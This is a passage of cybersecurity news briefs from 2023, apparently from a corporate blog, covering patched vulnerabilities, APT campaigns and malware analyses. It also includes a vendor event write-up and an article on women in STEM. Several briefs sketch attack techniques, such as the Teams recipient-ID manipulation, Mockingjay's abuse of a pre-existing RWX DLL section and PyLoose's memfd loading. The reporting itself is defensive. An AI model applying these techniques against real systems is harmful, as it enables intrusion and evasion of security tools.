130 vulnerabilities, including six 0-day flaws that have been actively exploited. Of the 130 vulnerabilities, nine were classified as critical and 121 as important. Some of the actively exploited security holes include privilege elevation vulnerabilities in the Windows MSHTML platform (CVE-2023-32046), bypassing the Windows SmartScreen and Microsoft Outlook security feature (CVE-2023-32049 and CVE-2023-35311), privilege escalation of the Windows error reporting service (CVE-2023-36874), and remote execution of Office and Windows HTML code (CVE-2023-36884). Other critical vulnerabilities were also published, including some that allow remote code execution. Microsoft urges its users to apply updates as quickly as possible to mitigate potential threats. More info Critical vulnerability in Citrix Secure Access fixed Citrix has issued a security advisory addressing a critical vulnerability that could allow threat actors to escalate their privileges if they have access to an endpoint with a standard user account. The vulnerability, identified as CVE-2023-24492, has a CVSS of 9.8 and affects Citrix Secure Client for Ubuntu in versions prior to 23.5.2. Attackers can exploit this vulnerability to remotely execute malicious code on a user's device. This can be achieved by persuading the user to click on a malicious link and accept subsequent prompts. Citrix also fixed another vulnerability recognised as CVE-2023-24491 (CVSS 7.8) that affects Citrix Desktop for Windows in versions prior to 23.5.1.3. This security flaw allows an authenticated attacker with access to a standard endpoint to elevate privileges to NT AUTHORITY SYSTEM. Both vulnerabilities were discovered by Rilke Petrosky of F2TC Cyber Security. Citrix recommends that users of these products upgrade to the latest versions to prevent exploitation. More info Analysis of PyLoose, Python-based fileless malware Researchers at Wiz.io have published an analysis of PyLoose, an innovative fileless malware that acts on cloud workloads. According to the researchers, this type of attack would have been used for cryptomining in up to 200 cases. Firstly, the attacker gains initial access via an exposed Jupyter Notebook service. Secondly, instead of writing payloads to disk, they exploit operating system features by decrypting and decompressing XMRig, loading it into memory via memfd, the Linux RAM-based file system. They finally run XMRig in memory, connected to a remote IP associated with the MoneroOcean mining cluster. It is worth noting the complexity of detection by conventional security measures that this type of attack presents. More info Image: rawpixel.com at Freepik.

Cyber Security has become a top priority for businesses. To have advanced solutions that offer comprehensive and robust protection is essential given the increase in cyberthreats and the constant risk faced by organisations. In this context, at Telefónica Tech, in collaboration with our strategic partner Check Point Software, we have positioned ourselves as a benchmark in the field of Cybersecurity. The most outstanding new features of Check Point Quantum Network Security were revealed at a recent event organised by Check Point Software. We included them in the portfolio of Cyber Security services that Telefónica Tech offers its customers. The new Cyber Security Landscape The event began by addressing the current cyber security landscape, highlighting concerns about next-generation attacks using AI-based technologies. Although manufacturers of cyber security solutions already have defence and protection technology that makes use of Artificial Intelligence, the implementation of these solutions is still a challenge for many companies. The event emphasised the need to change the way teams operate and the importance of having the skills to manage infrastructure more effectively. Two capabilities that we apply in the managed and professional services that we provide from Telefónica Tech when deploying cyber security technologies. The evolution of cyber threats Discussion during the event also focused on the evolution of cyber threats over the past year and the measures implemented to strengthen companies' defences. The increase in hacktivism, in the activity of more organised and politically motivated groups that have become more destructive, was mentioned. The use of legitimate tools by cybercriminals, who take advantage of applications already installed on users' devices to infiltrate malicious software, was highlighted. In this regard, a zero-trust strategy minimises such trends and provides more protection. Latest addition to Check Point Quantum Network Security portfolio: next-generation firewalls One of the most important aspects of the event was the presentation of new hardware technologies, such as Check Point Software's firewalls, to ensure customers' network security in three fundamental pillars: Check Point Quantum, which offers complete network protection. Check Point CloudGuard, focused on protecting cloud security. Check Point Harmony provides security for users, devices, mobile access and emails. These solutions are complemented by ThreatCloud, an intelligence network, and Horizon, a unified operations management platform. Within our partner Check Point Software's portfolio, the new Quantum firewalls stand out as an essential tool for access management and threat prevention at the perimeter and network segmentation. Check Point Software's new firewall proposition called Quantum Maestro allows you to connect and harden your network security infrastructure. Quantum Maestro is a single piece of hardware that connects all legacy clusters and even virtual firewalls, allowing growth on demand, adapting the need for hardware to traffic growth, optimising CAPEX investment and minimising the risk of forecasting incorrect needs. The ability to prevent in real-time versus detection is a significant advantage, reducing exposure to malware and minimising false positives. Threat Extraction, a feature that enables real-time delivery of completely clean office documents, was also presented. Another key aspect of the event was the importance of automation, integration with other technologies and dynamic policy building. The integration of Checkpoint's Security Platform with other technology vendors, such as Cisco ACI Switch Fabric and NSX-T, was highlighted as an important step towards unified security management. The Zero Trust strategy was also mentioned as an effective way to protect systems by denying all unauthorized access and allowing only what is necessary. In addition, the R81 Cyber Security Platform was presented, including SD-WAN and IoT Protect functionalities for enhanced network protection. The future of cyber security The event concluded by highlighting the fundamental role of Artificial Intelligence in the new Cyber Security landscape. The application of AI techniques, such as deep learning, allows for more accurate threat detection and a significant reduction in false positives. Check Point Software has developed more than 75 engines based on traditional and AI-based technologies to diagnose and prevent vulnerabilities in all technologies. Our partnership with Check Point Software benefits businesses by strengthening their security, resilience, and continuity through advanced security solutions, thereby reaffirming our joint commitment to deliver products and solutions for comprehensive and robust cyber security. AUTHORS IGNACIO GARCÍA HERRAEZ Strategic Partners Development Expert & MARISA STRZELECKI SINOPOLI Strategic Partners Development Sr Manager Cyber Security The importance of access control: is your company protected? May 29, 2023 Image from Freepik.

Rosalind Franklin, Liese Meitner, Ester Lederberg and Ada lovelace are just some of the women whose contributions to science were not recognised at the time because of their gender, because they were not men. Whilst we have come a long way, we cannot ignore the gender gap that widely exists in the in the fields of science, technology and mathematics (STEM), where women only make up 20% of the workforce. Empowering women from day 1 ensures STEM workforces are diverse. diversity breeds innovation and innovation breeds success. Education From an early age, boys are pushed towards science and maths to become astronauts, engineers and programmers, whilst girls are pushed towards humanity subjects and languages, celebrated for their creativity rather than their intelligence. It is estimated that a girl loses self-confidence in mathematical abilities between the ages of 13-15 years old, despite outperforming boys of similar ages in these fields. Education is an essential component to close the gender gap in STEM as it can stop underlying gender bias from day 1. It can give girls the hard skills required to become programmers, data scientists, engineers, physicians..., and it can teach everyone on the importance of diversity, not only in STEM but in every industry. “This is not about fixing women — it is about recognising that girls and young women often learn a set of concepts in early years that limit their views of themselves.” Gabriela Mueller Mendoza, speaker about diversity in STEM Schools are the key place to convince girls from day 1 that they are just as capable as their male counterparts. Girls often don’t choose to continue with these subjects because they never saw it as a possibility, maybe because no females in their family ever pursued science. Encouraging girls to believe in their intelligence is a necessity. Work experience A lack of role models and accessible work experience to show young girls how they can fit into this field of work is also responsible for the STEM gender gap. Whilst education can provide the hard skills necessary to be hired, nothing compares to real life experience. Female leaders already in the field need to be part of the movement to inspire the next generation, to act as mentors. This means going into local schools and youth centres to pass on expertise and advice. Education and work experience give girls the drive to work in STEM. Telefónica Tech «We are moving towards genderless professions», María Martínez August 8, 2022 Diversity Innovation in the workplace requires diversity, diversity of genders, cultures and ages to bring something new and creative. This means hiring a diverse workforce and training existing workforce on the importance of inclusion. A push for diversity may also mean companies need to stamp out unconscious and conscious biases, removing both legal barriers and social invisibilities. The solution needs to be a concerted effort to train HR, recruiters and managers of the importance of making teams diverse and keeping them that way, via upskilling or directly hiring skilled women to be part of the change. Also, within companies, there needs to be equal opportunities for women to be promoted. Diversity is also very important in programming to produce fair machine learning sytems. If these automated systems are fed with examples of biased justice, they will end up perpetuating these same biases. Diversity in programming teams is important to spot these biases and mitigate against them. Artificial Intelligence will only learn to be inclusive, fair and representative if we are. Diversity in the workplace means there are increased the opportunities for women which encourage them to enter and remain in STEM careers. Support those at the top Too often woman at the top are not given the recognition they deserve. Once women reach the top, they need to be celebrated, not doubted. More comments are made about what they are wearing than what they have achieved and how hard they worked to get there. We all need to celebrate those women in our company, sector or community who have climbed to the top. Self-belief As with many things, as women we need to have the self-belief to achive what we want in STEM because we are no less capable than the men around us! Together we can close the gender gap in STEM. Telefónica Tech Women's Engineering Day: Building New Paths June 23, 2022 Photo: Unsplash.

Microsoft denies being a victim of data breach by Anonymous Sudan The hacktivist group Anonymous Sudan recently posted on its Telegram channel that an alleged database containing more than 30 million Microsoft account credentials was for sale for $50,000. It also included a sample of data as proof of the threat actor's claims. However, digital media outlet BleepingComputer contacted Microsoft for information about the incident, to which a company spokesperson said that after conducting an internal investigation there was no evidence that the data had been accessed or compromised by Anonymous Sudan. It is worth noting that last month Microsoft admitted that Anonymous Sudan was responsible for disruptions to services such as Azure, Outlook and OneDrive through DDoS attacks. More info Mozilla fixes vulnerabilities in Firefox Mozilla has released Firefox 115, which fixes a number of vulnerabilities. Firstly, there are a number of high-impact vulnerabilities, CVE-2023-37201, a Use-after-free flaw in WebRTC. CVE-2023-37202 also refers to a potential Use-after-free flaw in SpiderMonkey. In addition, CVE-2023-37211 and CVE-2023-37212, identified as CVE-2023-37211 and CVE-2023-37212, are due to memory security bugs, which could be exploited to execute arbitrary code. On the other hand, CVE-2023-3482, with a moderate impact, could cause malicious websites to store tracking data without permission, even if they are configured to block the storage of cookies. The other moderate impact vulnerabilities include those identified as CVE-2023-37203, CVE-2023-37204, CVE-2023-37205, CVE-2023-37206, CVE-2023-37207, CVE-2023-37208 and CVE-2023-37209; which could lead to spoofing attacks or bugs that allow URL spoofing in the address bar, insufficient validation of links in the file system API, missing warnings when opening files with malicious or Use-after-free code. It is recommended to update Firefox to fix these security issues. More info Cyber Security AI of Things Cosas que no deberías contarle a ChatGPT 4 de julio de 2023 Malicious campaign against banks in Spain and Chile SentinelOne researchers, in collaboration with vx-underground, have published the results of an investigation into a campaign targeting banking institutions by threat actor Neo_Net. The malicious actor is reportedly behind an Android malware campaign targeting financial institutions around the world, but mainly geolocated in Spain and Chile, between June 2021 and April 2023. Neo_Net is estimated to have stolen more than €350,000 from bank accounts and compromised the personal information of thousands of victims. In terms of methodology, the attacks would occur in several stages, starting with SMS phishing messages, using sender IDs (SIDs) to impersonate the bank in order to trick victims, and continuing with a wide-ranging infrastructure, including phishing panels and Android trojans. More info Google fixes three actively exploited Android vulnerabilities Google has released monthly security updates for the Android operating system in which it fixed 46 vulnerabilities affecting the OS, including three 0-day vulnerabilities that were being actively exploited. The first of these, identified as CVE-2023-26083 (CVSS 3.3) is a memory leak flaw in the Arm Mali GPU driver for Bifrost, Avalon and Valhall chips, which was exploited in a chain of exploits that delivered spyware to Samsung devices in December 2022. The second security flaw, CVE-2021-29256 (CVSS 8.8) is a high-severity root privilege escalation and information disclosure flaw that also affects specific versions of the Bifrost and Midgard Arm Mali GPU kernel drivers. The third vulnerability, CVE-2023-2136 (CVSS 9.6), is an integer overflow bug in Skia, Google's open-source cross-platform 2D graphics library that is also used in Chrome. In addition, a critical vulnerability (CVE-2023-21250) in the Android system component affecting OS versions 11, 12 and 13 was fixed. Exploitation of this vulnerability could lead to remote code execution without user interaction or additional execution privileges. Google recommends updating Android to patch level 2023-07-05 or later to address these issues. More info New tool developed to deliver malware to Teams users The US Navy Red Team has developed a tool that can exploit a vulnerability in Microsoft Teams and deliver malicious files to users in an organisation. The tool, called TeamsPhisher, is Python-based and provides a fully automated attack. It works in environments where communication between internal and external Teams users is allowed. Malicious actors could send malicious files to victims' inboxes without relying on traditional phishing scams. TeamsPhisher incorporates techniques on initial access to Teams described by researcher Andrea Santese. It also includes the one recently disclosed by researchers at Jumpsec Labs, which allows circumventing a security feature in Teams by using a direct insecure object reference (IDOR) technique. In addition, it uses a tool called TeamsEnum developed by Secure Systems Engineering to enumerate Teams users and verify that they can receive external messages. Microsoft continues to fail to address the vulnerability that TeamsPhisher exploits, claiming that it does not meet the requirements for immediate service. More info Cyber Security AI of Things Evolución de la Ciberseguridad: la IA como herramienta de ataque y defensa 28 de junio de 2023 Photo: tirachardz / Freepik.

BIND DNS server vulnerabilities fixed The Internet Systems Consortium (ISC) has issued security advisories to address multiple vulnerabilities affecting several versions of Berkeley Internet Name Domain (BIND), the most widely deployed DNS server software. The vulnerabilities addressed include CVE-2023-2828, CVE-2023-2829 and CVE-2023-2911, all with CVSS 7.5. Their successful exploitation could exhaust all available memory on a target server, making it unavailable and causing DoS. Although ISC said it has no evidence of exploitation of the flaws, it strongly recommends that BIND users upgrade to the latest version of the software. More info New Volt Typhoon campaign exploiting vulnerability in Zoho ManageEngine The APT known as Volt Typhoon or Bronze Silhouette has been detected using a critical vulnerability. According to research by CrowdStrike, which tracked the adversary under the name Vanguard Panda, it observed the cyberespionage group in a recent campaign targeting critical infrastructure in the Pacific region. In that campaign, the group customised its tactics using exploits and lateral movement techniques, as well as the CVE-2021-40539 vulnerability in Zoho's ManageEngine ADSelfService Plus, a password management and single sign-on solution. Allowing them to remotely execute code and mask their web shell as a legitimate process by deleting logs as it went along. However, the researchers mention that despite attempts to cover their tracks, more web shells, backdoors, Java source code and compiled files from their Apache Tomcat web server were detected, leading to their discovery. Volt Typhoon nonetheless had widespread access to the victim's environment over an extended period, demonstrating familiarity with the targeted infrastructure and being diligent in cleaning up its tracks. More info Mockingjay: new technique to bypass EDR detection Cybersecurity researchers at Security Joes discovered a new process injection technique called Mockingjay, which could allow threat actors to bypass EDR and other security products to stealthily execute malicious code on compromised systems. Mockingjay differs from other approaches because it does not use commonly abused Windows API calls, set special permissions, perform memory allocations, or even start a thread, eliminating many potential opportunities for detection. Security Joes analysts discovered the msys-2.0.dll DLL inside Visual Studio 2022 Community, which had a default RWX section 16 KB in size. By leveraging this pre-existing RWX section, one can take advantage of the inherent memory protections it offers, effectively bypassing any functions that may have already been detected by EDRs. More info Campaign against web hosting companies uncovered Researchers at Unit 42 in Palo Alto uncovered an active campaign that targeted web hosting and IT companies for more than two years. The campaign, named CL-CRI-0021 or Manic Menagerie 2.0, aimed to leverage the resources of compromised servers by installing cryptocurrency miners on machines for monetary gain. In addition, it deployed web shells to gain sustained access to the internal resources of compromised websites. Threat actors turned hijacked legitimate websites into large-scale command and control (C2) servers, affecting thousands of web pages. This malicious activity was carried out from legitimate, reputable websites, making it difficult for security solutions to detect. Multiple techniques were used to evade detection by monitoring tools and cybersecurity products. Payloads, custom tools, and legitimate publicly available tools were also used to avoid recognition of known malware. This threat actor is believed to have been active since at least 2018, targeting web hosting companies in Australia. More info Analysis of Dark Power Ransomware Researchers at Heimdal Security have published an analysis of the Dark Power ransomware, which was detected in early 2020. It is a highly effective ransomware written by NIM, which employs an encryption technique that randomly generates a unique ASCII string that is used to obtain the decryption key. Heimdal reports that the distribution would be done via phishing emails and could also be done through the exploitation of vulnerabilities. After infiltrating the system, it starts a workflow in which it initiates the encryption key, encrypts the binary string, terminates processes and services, and can also create the exclusion of files and folders. As for the ransom, the actors are asking for approximately $10,000, including in the note the Monero cryptocurrency address and a TOR link to their website. According to the data, Dark Power is said to have targeted entities in different sectors such as education, healthcare, manufacturing, and food production, with samples identified in the US, Peru, Turkey, France, Israel, Egypt, Algeria and the Czech Republic. Since its re-emergence last February, at least 10 companies have been compromised. More info Image: Freepik.

Critical vulnerabilities in Asus routers Asus has issued a security advisory addressing a total of nine vulnerabilities affecting multiple router models. Among these security flaws, the one registered as CVE-2022-26376, which is due to a memory corruption in the Asuswrt firmware that could allow threat actors to perform denial-of-service attacks or allow code execution, stands out for its criticality. The vulnerability registered as CVE-2018-1160 is due to a Netatalk write out of bounds weakness, which could be exploited to allow arbitrary code execution on vulnerable devices. In addition, Asus has indicated that if the new firmware version cannot be installed on the affected devices, it is recommended to disable the services accessible from the WAN side to avoid possible repercussions. More info Critical vulnerabilities in WordPress plugins Researchers at Defiant have identified two critical authentication bypass vulnerabilities in two WordPress plugins with tens of thousands of installations. On the one hand, there is the security flaw registered as CVE-2023-2986, CVSSv3 of 9.8, which affects Abandoned Cart Lite for WooCommerce. Exploiting this vulnerability could allow malicious actors to log in as customers or access admin accounts and compromise the affected website. However, the issue has been patched in version 5.15.1 of Abandoned Cart Lite for WooCommerce. On the other hand, there is the CVE-2023-2834 vulnerability affecting the WordPress Booklt plugin. An attacker could exploit this flaw to gain access to any account on the affected website, including the administrator account, knowing only the email address. This issue has been fixed in BookIt version 2.3.8. More info Apple patches the two 0-days used in Operation Triangulation Apple has released an emergency security update to patch the two 0-day vulnerabilities used in Operation Triangulation, as the incident’s discoverer Kaspersky called the campaign. The two vulnerabilities, CVE-2023-32434 and CVE-2023-32435, were exploited in a zero-click attack (receipt of the message triggers the infection without the need for user interaction) against iOS devices via iMessage. This security update from Apple coincides with Kaspersky’s publication of its final analysis of the so-called Operation Triangulation and the spyware in which it exploits the two 0-days. Kaspersky highlights that it has capabilities to manipulate files, interfere with running processes, exfiltrate credentials and certificates as well as transmit geolocation data, including the device’s coordinates, altitude, speed, and direction of movement. More info Microsoft Teams flaw allows malware to be distributed Researchers at Jumpsec have published the results of an investigation in which they claim to have identified a security flaw in Microsoft Teams that could allow malware to be distributed. Specifically, the experts say they have discovered a way for an account outside the target organisation to bypass the relevant security measures to allow malware to be delivered directly into the inbox. The attack methodology works in case the victim is running Microsoft Teams with default settings, and the attacker needs to change the internal and external recipient ID in the POST request of a message, thus tricking the system into treating an external user as internal. This way, when the executable is sent, it is actually hosted on a SharePoint domain and the target downloads it from there. Microsoft acknowledges the problem, but has pointed out that it does not meet the requirements to fix the bug immediately. More info New Mirai variant exploits multiple IoT exploits A variant of the Mirai botnet has been discovered by researchers at Palo Alto Networks Unit 42. The variant targets nearly two dozen vulnerabilities in devices from brands such as D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear and MediaTek, with the aim of using them in DDoS attacks. The malware has been identified in two ongoing campaigns that started in March and escalated in April and June and targets a total of 22 known security holes in various connected products such as routers, DVRs, NVRs, access control systems, among others. The attack starts by exploiting one of the aforementioned flaws and then downloads a botnet client suitable for the compromised device and directly accesses the encrypted strings, making it difficult to detect. Unlike other Mirai variants, this one does not have the ability to obtain brute-force login credentials, so it relies on manual exploitation of vulnerabilities by operators. Signs of infection of this botnet on IoT devices include overheating, configuration changes, frequent disconnections, and a general decrease in performance. More info

Microsoft has fixed more than 70 vulnerabilities in its June Patch Tuesday Microsoft has released its June Patch Tuesday, addressing a number of critical, high, medium and low severity vulnerabilities. Three of the critical vulnerabilities, CVE-2023-29363 , CVE-2023-32014 and CVE-2023-32015, with CVSS 9.8, are in the Windows Pragmatic General Multicast server environment and can lead to remote code execution by sending a specially crafted file over the network. On the other hand, flaw CVE-2023-29357, also with CVSS 9.8, would allow privilege escalation in Microsoft SharePoint Server. Exploitation of this vulnerability does not require user interaction and Microsoft advises to apply updates and enable the AMSI function. Another vulnerability that allows remote code execution is CVE-2023-28310, with CVSS 8.0, in Microsoft Exchange Server. On the other hand, CVE-2023-29358, allows privilege escalation in the Windows GUI to SYSTEM, as does CVE-2023-29361. As for the flaw in Microsoft Exchange, with CVE-2023-32031 and CVSS 8.8, it allows an attacker to target server accounts in an arbitrary code execution. Finally, the flaw CVE-2023-29371, in the Windows Win32k kernel driver, could lead to an out-of-bounds write, granting SYSTEM privileges and the one identified as CVE-2023-29352, not as serious, refers to a security feature omission in Windows Remote Desktop. More info Third security flaw discovered in MOVEit Transfer application Progress Software recently reported a third critical vulnerability in its MOVEit Transfer application. The new vulnerability, still without a CVE identifier, is a SQL injection that can allow privilege escalation and unauthorised access. A patch addressing this new critical security flaw is not yet available; the company stated that one is currently being tested and will be released soon. Progress also strongly advised users to modify firewall rules to deny HTTP and HTTPs traffic to MOVEit Transfer on ports 80 and 443 as a temporary protective measure. This disclosure comes a week after another set of SQL injection vulnerabilities were reported that could be used to access the application’s database. And they come on top of CVE-2023-34362, which was exploited by the Clop ransomware gang in data theft attacks whose actors continue to extort money from affected companies. An analysis by Censys revealed that nearly 31 per cent of the more than 1,400 exposed hosts running MOVEit are in the financial services industry, 16 per cent in healthcare, nine per cent in information technology and eight per cent in government and military sectors. More info AiTM campaign against companies in the financial sector Microsoft Defender researchers have uncovered the existence of a Business Email Compromise (BEC) campaign that uses the AiTM (adversary in the middle) technique against large companies in the financial sector. In AiTM phishing, threat actors set up a proxy server between a targeted user and the website the user wants to visit, which is the phishing site under the control of the attackers. The proxy server allows the attackers to access the traffic and capture the target’s password and session cookie. According to Microsoft, the attack started with the compromise of a reputable company’s email account, using that email address to distribute the phishing AiTM and thus steal the credentials of its contacts, who would have accessed the URL given the trust relationship with the supposed sender (impersonated by the attacker) of the email. Microsoft attributes this campaign to a threat actor it has named Storm-1167 (in Microsoft’s taxonomy, the name Storm indicates that the origin of the criminal group is unknown). More info DoubleFinger distributes both Remcos RAT and GreetingGhoul stealer SecureList has published a report on a new loader called DoubleFinger, which is notable for its use of shorthand techniques as a way to hide payloads. This malware runs a shellcode on the infected machine that downloads a PNG file from the image-sharing platform Imgur.com, but it is not actually an image: the file contains several components in encrypted form: GreetingGhoul, a stealer targeting cryptocurrency wallets, on the one hand, and the remote access Trojan Remcos, on the other. SecureList claims to have seen DoubleFinger, which is distributed via email phishing, attacking entities in Europe, the United States and Latin America. More info Powerful BatCloak engine used to make malware completely undetectable Trendmicro has published an analysis of the BatCloak malware obfuscation engine, its modular integration into modern malware, proliferation mechanisms, and implications for interoperability as threat actors take advantage of its fully undetectable capabilities. As a result, threat actors can seamlessly load multiple malware families and exploits leveraging highly obfuscated batch files. Research results showed that a staggering 80% of the recovered samples were not detected by security solutions. This finding underlines BatCloak’s ability to bypass traditional detection mechanisms employed by security vendors. Furthermore, when considering the total set of 784 samples, the average detection rate was less than one, highlighting the challenge of identifying and mitigating threats associated with BatCloak-protected pieces of malware. More info

Barracuda warns of immediate replacement of compromised ESG appliances Security firm Barracuda has issued a warning in which it is urging organisations affected by the 0-day vulnerability (CVE-2023-2868) in their Email Security Gateway (ESG) appliances to replace them completely. Although it has been patched and the attackers’ access to the compromised devices has been removed, the company’s recommendation is to immediately replace the affected devices, regardless of the version of the patch installed. The exact scope of the incident is still unknown. The vulnerability, which has been exploited for at least seven months, allows remote code injection into incoming email attachments, installing custom malware, uploading, or downloading files, executing commands, establishing persistence and setting up reverse shells on a server controlled by a malicious actor. Affected users have already been notified via the ESG user interface. Barracuda urges organisations that have not yet replaced their devices to contact support urgently by email. More info Joint CISA and FBI Advisory regarding CLOP ransomware As part of the #StopRansomware campaign, CISA and the FBI have jointly issued an alert including new tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with the CLOP ransomware. The advisory highlights the group’s exploitation of CVE-2023-34362, a 0-day vulnerability in MOVEit Transfer, to execute a webshell called LEMURLOOT on victims to steal data. CLOP, in a statement on its TOR network website, acknowledged that this vulnerability has compromised hundreds of companies and that it is giving those affected until 14 June to contact them and begin ransom negotiations. If they do not reach an agreement within 72 hours of the start of negotiations, they will publish the data. Also, Kroll researchers discovered evidence of similar activity was found in logs of affected customers in the past, indicating that threat actors were testing access and data mining on compromised MOVEit Transfer servers since at least 2021. More info Critical vulnerability in Cisco products The company Cisco has issued several security advisories to correct up to a total of 8 vulnerabilities, 2 of which are classified as critical, 3 as high risk and 3 as medium risk. Among the most critical security flaws are those affecting the Cisco Expressway Series and Cisco TelePresence Video Communication Server products, which have been registered as CVE-2023-20105 and CVE-2023-20192. Regarding the first vulnerability, it derives from the incorrect handling of password change requests, which would allow an attacker to alter the passwords of any user on the system. As for the second, it could allow a local, authenticated attacker to execute commands and modify system configuration parameters. Cisco says there is no evidence that these vulnerabilities have been exploited, but recommends that users update their assets as soon as possible to mitigate these security flaws. More info New Chrome security update Google has issued a security update for its Chrome browser in which it addresses two security updates, one of which is classified as highly critical. This security flaw was identified by security researcher Clément Lecigne on 1 June 2023, being registered as CVE-2023-3079, and still pending CVSS. It is a vulnerability in V8 that would allow a remote attacker to create an HTML page that triggers privilege escalation and execute arbitrary code. It should also be noted that Google has indicated that it is aware that an exploit for this vulnerability exists. This security flaw has been fixed with the update in versions 114.0.5735.106 on Mac and Linux devices and 114.0.5735.110 for Windows. More info Image: Freepik.

Backdoor discovered in hundreds of Gigabyte motherboards Cybersecurity researchers at Eclypsium discovered a secret backdoor in the firmware of hundreds of Gigabyte motherboard models, a well-known Taiwanese manufacturer. Every time a machine with one of these motherboards is rebooted, an update application downloaded and executed by the board's firmware is silently activated, allowing the installation of other, possibly malicious, software. The firmware on these systems removes a Windows binary at operating system startup and downloads and executes another payload from Gigabyte's servers over an insecure connection without verifying the legitimacy of the file. A total of 271 different motherboard versions were identified as vulnerable. Although the feature appears to be related to the Gigabyte App Center, it is difficult to rule out the possibility of a malicious backdoor due to the lack of proper authentication and the use of insecure HTTP connections instead of HTTPS which could allow for man-in-the-middle attacks. Even if Gigabyte fixes the issue, firmware updates may fail on users' machines due to their complexity and difficulty in matching with the hardware. In addition, the updater could be used maliciously by actors on the same network to install their own malware. More info CYBER SECURITY Google's Passkey is just another nail in the password coffin May 17, 2023 SharpPanda's campaign against the G20 Cyble has published an investigation in which it shares its findings on the campaign currently being developed by the SharpPanda espionage group, allegedly backed by the Chinese government, against the member countries of the G20 (the international forum that brings together the world's most industrialized countries along with organizations such as the UN or the World Bank). As Cyble explains, the campaign starts with the distribution of emails to high-ranking officials of the targeted countries in which a .docx file supposedly generated by the G7 (a group of countries within the G20) is included. This file downloads an RTF document that includes the RoyalRoad malware kit. The exploit creates a scheduled task and executes a malware DLL downloader, which executes another Command & Control (C2) DLL. RoyalRoad exploits a specific set of vulnerabilities, including CVE-2018-0802 , CVE-2018-0798 y CVE-2017-11882, within Microsoft Office. More info 0-day vulnerability actively exploited in Email Security Gateway for months Barracuda recently issued a statement warning customers about an actively exploited 0-day vulnerability in its Email Security Gateway asset. The security flaw was identified as CVE-2023-2868 and it is noted that exploiting it could allow a remote attacker to perform code execution on vulnerable systems. However, new information has emerged that has identified that the exploitation of this vulnerability has been taking place since October 2022 using a total of three different strains of malware, namely Saltwater, Seaspy and Seaside. Barracuda has not released any information about the victims publicly, but they have identified evidence of exfiltration of information in some victims to whom all the information has been reported. It should be noted that this vulnerability affects versions 5.1.3.001 to 9.2.0.006 and was fixed on May 20 and 21. More info CYBER SECURITY Cybersecurity: “black swan“ events in a connected world March 21, 2023 New analysis of BlackCat ransomware The IBM research team has published an analysis in which it mentions new ransomware variants that enable better data exfiltration and evasion of security solutions. In particular, the experts note that the operators of the BlackCat/ALPHV ransomware continue to evolve the tool, especially from two perspectives. On the one hand, the operators of this malware are reportedly using ExMatter malware in their operations, the function of which is to optimise file exfiltration processes. On the other hand, IBM says it has analysed a new strain of BlackCat, which it has dubbed Sphynx, which stands out for having a series of capabilities that allow it to evade security solutions more effectively. IBM points out that these ransomware evolutions show that the operators behind these threats are increasingly aware of the systems' infrastructures and are trying to improve their operational efficiency. More info CISA has warned about two vulnerabilities in industrial control systems CISA has issued a warning about two vulnerabilities affecting industrial control systems, specifically Moxa's MXsecurity product. Firstly, the vulnerability identified as CVE-2023-33235, with CVSS of 7.2, is a command injection vulnerability that can be exploited by attackers who have obtained authorisation privileges and can exit the restricted shell and execute arbitrary code. On the other hand, CVE-2023-33236, with CVSS 9.8, can be exploited to create arbitrary JWT tokens and bypass authentication of web-based APIs. Notably, Moxa has addressed these flaws with the update to v1.0.1. For its part, CISA recommends that users implement defensive measures to minimise the risk of exploitation, such as minimising network exposure for devices, using firewalls and VPNs. More info Featured photo: DCStudio on Freepik.

GitLab patches a critical vulnerability GitLab has addressed a critical vulnerability affecting GitLab Community Edition (CE) and Enterprise Edition (EE) in version 16.0.0. This security flaw has been reported as CVE-2023-2825, CVSSv3 of 10, and was discovered by a security researcher named pwnie. As for the cause of the flaw it arises from a cross-pathing issue that could allow an unauthenticated attacker to read arbitrary files on the server when there is an attachment in a public project nested within at least five groups. Therefore, exploitation of this vulnerability could trigger the exposure of sensitive data such as proprietary software code, user credentials, tokens, files and other private information. GitLab recommends its users to update to the latest version, 16.0.1, to fix this security issue.. More info → Zyxel patches two critical vulnerabilities in its firewalls Zyxel has issued a security advisory reporting two critical vulnerabilities affecting several of its firewall models. Specifically, these vulnerabilities are the one registered as CVE-2023-33009 with a CVSSv3 of 9.8, which is a buffer overflow vulnerability in the notification function that could allow an unauthenticated malicious actor to perform remote code execution or launch a DDoS attack. Likewise, the bug assigned as CVE-2023-33010 counts a CVSSv3 of 9.8, which is also a buffer overflow vulnerability in the ID processing function, and its exploitation could lead to the same types of attacks as the previous one. Zyxel recommends its users to apply the corresponding security updates to reduce the risk of exploitation of these two vulnerabilities. More info → BEC attacks spike in volume and complexity In a recent report from Microsoft Cyber Signals, Microsoft's CTI teams warn of a significant spike in BEC (Business Email Compromise) attacks between April 2022 and April 2023 that have resulted in $2.3 billion in losses according to FBI estimates. Among the most observed trends, two stand out: the use of BulletProftLink (a cybercriminal marketplace that provides all kinds of utilities to carry out phishing and spam campaigns) and the purchase of compromised residential IP addresses that are used as proxies to mask their social engineering attacks. Among their most targeted targets are executives, managers and team leaders in finance and human resources departments with access to their employees' personal information. Microsoft recommends mitigating the impact of these campaigns by maximizing mailbox security options, enabling multi-factor authentication and keeping staff informed and trained about these types of attacks. More info → Volt Typhoon: Chinese APT targeting U.S. critical infrastructure Both Microsoft Threat Intelligence and CISA has published a report on an APT allegedly backed by the Chinese government which they have named Volt Typhoon and which they accuse of being behind a campaign of attacks against critical U.S. infrastructures such as government institutions, military, telecommunications companies or shipping, among others. Microsoft specifically claims that Volt Typhoon has tried to access U.S. military assets located on the island of Guam, a key territory in case of conflict in Taiwan or the Pacific using as an entry vector FortiGuard devices exposed to the Internet by exploiting 0-day vulnerabilities to extract credentials that allow them to move laterally. Microsoft points out that Volt Typhoon abuses the legitimate tools present in the attacked systems by camouflaging its activity as routine processes to try to go unnoticed, a technique known as Living Off The Land (LOTL). More info → Vulnerability in KeePass allows master passwords to be recovered Security researchers have published an article about a new vulnerability that allows master passwords to be recovered in the KeePass password manager. The vulnerability has been classified as CVE-2023-32784 and affects KeePass versions 2.x for Windows, Linux and macOS. It is expected to be patched in version 2.54, and a PoC is available for this security flaw. For exploitation, it does not matter where the memory comes from, and whether the workspace is locked or not. In addition, it is also possible to dump the password from RAM when KeePass is no longer running. It should be noted that successful exploitation of the flaw relies on the condition that an attacker has already breached the computer of a potential target and that the password is required to be typed on a keyboard and not copied from the device's clipboard. More info → Featured photo: Pankaj Patel / Unsplash

